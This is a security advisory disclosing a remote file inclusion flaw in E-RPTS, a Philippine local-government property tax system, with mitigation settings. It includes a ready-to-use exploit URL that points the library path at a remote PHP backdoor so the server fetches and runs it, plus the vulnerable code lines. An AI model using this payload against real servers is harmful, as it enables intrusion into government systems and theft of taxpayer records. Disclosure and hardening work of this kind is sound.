About E-RPTS

(from the website)
An Open Source solution for Real Property Taxation in the Philippines

Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).

eRPTS web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allows LGUs to improve their monitoring of compliance and revenue generation.

This is a critical vulnerability since the software is being implmented on each of Philippine government's Local Government Units and could expose sensitive data such as tax records and other business related details.

The vulnerability

in the file:

/includes/web/prepend.php



line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");




This code is vulnerable to Remote File Include vulnerability by going to

http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?

For this vulnerability to work, register_globals must be set to on and allow_URL_fopen set to on.


Recommendations

You should disable allow_url_fopen in the php.ini file:

allow_url_fopen = 'off'

The setting can also be disabled in apache's httpd.conf file:

php_flag  allow_url_fopen  off

This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.

__________________
Bug Discovered by:
John Homer Alvero
__________________


References: